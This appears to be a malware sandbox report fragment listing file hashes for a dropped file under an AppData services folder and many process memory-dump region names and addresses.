SHA512 18c9ad43e942f4cdf9f4518e7addc1e63a4b8b4d0d6a4ed9e8e7f090a27c7a53c5799c261e8c1cd9d94f3dc2c3341058e8249ba61663702b9145664e80800c04

C:\Users\Admin\AppData\Roaming\services\3plugin0222

MD5 80bcb38648b26f49bcd6d03e5092a1a7
SHA1 52ee828d83ef2eba98331eb75f57d07866157466
SHA256 fb72cbd71525212ec2230b3548fb0bf38d2f8567ff8c17bc92d15b9350f36ed7
SHA512 7baeb8fcbc33e31810cad4d3c956e53ff71e3cfe82873ad3ae6a06fa31b7a088856957b0597c4dbf05e389c019894dba406589b6cd585b7f3b16622052a8eb26

memory/1956-7415-0x00000000001C0000-0x0000000000236000-memory.dmp

memory/1956-7417-0x0000000004B60000-0x0000000004BA0000-memory.dmp

memory/1956-7416-0x000000006F9A0000-0x000000007008E000-memory.dmp

\Users\Admin\AppData\Roaming\services\3plugin0222

MD5 c5bc6c28087c26ef3ca64d115651ee19
SHA1 9faf5c481d145163156c9e8387e0003b8b4e33b3
SHA256 e56e3bef6e130c82df4c71add34d421e911c37e035c081789e0146478b4e2893
SHA512 08bee8d19e3ca1a65ff9da81dc75a1daec707eb4ec33057007b4978d6355f64dd130022d2f42e0ab76188a889588d785777dbbb7ad77cf675a6d40a7effb64a4

memory/2536-7422-0x0000000000400000-0x0000000000450000-memory.dmp

memory/2536-7423-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2536-7421-0x0000000000400000-0x0000000000450000-memory.dmp

memory/2536-7420-0x0000000000400000-0x0000000000450000-memory.dmp

memory/2536-7419-0x0000000000400000-0x0000000000450000-memory.dmp

memory/2536-7425-0x0000000000400000-0x0000000000450000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\3plugin0222

MD5 6164f713aa4d0d3a992630a0c906486e
SHA1 55d2359560ce1d45c29725ea8aecc52de174ad24
SHA256 f34fcbc39aa607c3ee965a67088788293623671fcf45cca40e334f3b1f4b63d3
SHA512 7a63f47cc8fc175b9a0d85c01cdae5cfd7bd417c211c677862be4476acb2db7b80c03068fb65fad733847556ae8783a260271f64e5b48ee54b20dc4701c29fe9

memory/1956-7428-0x000000006F9A0000-0x000000007008E000-memory.dmp

memory/2536-7429-0x0000000000400000-0x0000000000450000-memory.dmp

memory/2536-7431-0x0000000000400000-0x0000000000450000-memory.dmp

memory/996-7432-0x000000013F890000-0x0000000140225000-memory.dmp

memory/2536-7433-0x000000006F2B0000-0x000000006F99E000-memory.dmp

memory/2536-7434-0x0000000000980000-0x00000000009C0000-memory.dmp

memory/1952-7435-0x00000000055B0000-0x0000000005F45000-memory.dmp

memory/2468-7440-0x000007FEF4B00000-0x000007FEF549D000-memory.dmp

memory/2468-7442-0x0000000002BE0000-0x0000000002C60000-memory.dmp

memory/1952-7443-0x00000000055B0000-0x0000000005F45000-memory.dmp

memory/2468-7445-0x0000000002BE0000-0x0000000002C60000-memory.dmp

memory/2468-7444-0x000007FEF4B00000-0x000007FEF549D000-memory.dmp

memory/2468-7441-0x000000001B520000-0x000000001B802000-memory.dmp

memory/2468-7446-0x0000000002BE0000-0x0000000002C60000-memory.dmp

memory/2468-7447-0x0000000001EB0000-0x0000000001EB8000-memory.dmp

memory/2468-7448-0x0000000002BE0000-0x0000000002C60000-memory.dmp

memory/2468-7449-0x000007FEF4B00000-0x000007FEF549D000-memory.dmp

memory/996-7452-0x000000013F890000-0x0000000140225000-memory.dmp

memory/2416-7453-0x000000013F190000-0x000000013FB25000-memory.dmp

memory/1676-7455-0x00000000016A0000-0x0000000001720000-memory.dmp

memory/1676-7454-0x000007FEF4160000-0x000007FEF4AFD000-memory.dmp

memory/1676-7457-0x00000000016A0000-0x0000000001720000-memory.dmp

memory/1676-7456-0x000007FEF4160000-0x000007FEF4AFD000-memory.dmp

memory/1676-7458-0x00000000016A0000-0x0000000001720000-memory.dmp

memory/1676-7459-0x000007FEF4160000-0x000007FEF4AFD000-memory.dmp

memory/1452-7470-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7471-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7469-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7472-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/2216-7467-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2216-7465-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2216-7464-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2216-7463-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2216-7462-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2416-7474-0x000000013F190000-0x000000013FB25000-memory.dmp

memory/2216-7461-0x0000000140000000-0x000000014000D000-memory.dmp

memory/1452-7476-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7477-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7478-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7479-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7480-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7481-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7482-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7483-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7484-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7485-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7486-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7487-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7495-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7496-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7497-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/2536-7508-0x000000006F2B0000-0x000000006F99E000-memory.dmp

memory/1452-7507-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7527-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7529-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7528-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/1452-7537-0x0000000076E50000-0x0000000076FF9000-memory.dmp

memory/1452-7551-0x0000000000CB0000-0x0000000000CD0000-memory.dmp

memory/1780-7552-0x0000000002170000-0x0000000002171000-memory.dmp

memory/2868-7571-0x0000000072E90000-0x000000007343B000-memory.dmp

memory/2536-7572-0x000000006F2B0000-0x000000006F99E000-memory.dmp

memory/1452-7573-0x0000000076E50000-0x0000000076FF9000-memory.dmp

memory/1452-7574-0x0000000000CB0000-0x0000000000CD0000-memory.dmp

memory/1780-7575-0x0000000002170000-0x0000000002171000-memory.dmp